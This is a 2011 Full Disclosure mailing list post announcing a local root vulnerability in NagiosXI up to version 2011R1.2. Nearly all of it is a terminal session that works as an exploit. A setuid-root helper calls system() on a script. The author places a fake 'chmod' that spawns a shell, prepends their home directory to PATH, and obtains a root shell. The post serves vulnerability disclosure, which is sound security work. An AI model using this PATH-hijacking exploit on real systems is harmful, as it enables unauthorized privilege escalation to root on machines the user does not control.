Full Disclosure mailing list archives
NagiosXI (commerciale Nagios) Local Root
From: rootbsd <rootbsd () r00ted com>
Date: Thu, 12 May 2011 08:25:28 +0000
# Exploit Title: NagiosXI (Commercial Nagios) Local Root Vulnerability # Date: 2011-05-15 # Author: RootBSD # Software Link: http://www.nagios.com # Version: <= 2011R1.2 # Tested on: all linux rootbsd@laptop:~$ id uid=1001(rootbsd) gid=1001(rootbsd) groupes=1001(rootbsd) rootbsd@laptop:~$ ls -l /usr/local/nagiosxi/scripts/reset_config_perms -rwsr-xr-x 1 root nagios 5258 2011-04-11 20:38 reset_config_perms rootbsd@laptop:~$ cat /usr/local/nagiosxi/scripts/reset_config_perms.c #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main() { if(setuid( 0 )!=0) printf("ERROR TRYING TO SETUID ROOT!\n"); else printf("SETUID ROOT OK\n"); system( "/usr/local/nagiosxi/scripts/reset_config_perms.sh" ); return 0; } rootbsd@laptop:~$ cat /home/rootbsd/chmod #!/usr/bin/ksh ksh rootbsd@laptop:~$ chmod 755 /home/rootbsd/chmod rootbsd@laptop:~$ export PATH=/home/rootbsd:$PATH rootbsd@laptop:~$ /usr/local/nagiosxi/scripts/reset_config_perms SETUID ROOT OK RESETTING PERMS # id uid=0(root) gid=0(root) groupes=0(root) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- NagiosXI (commerciale Nagios) Local Root rootbsd (May 12)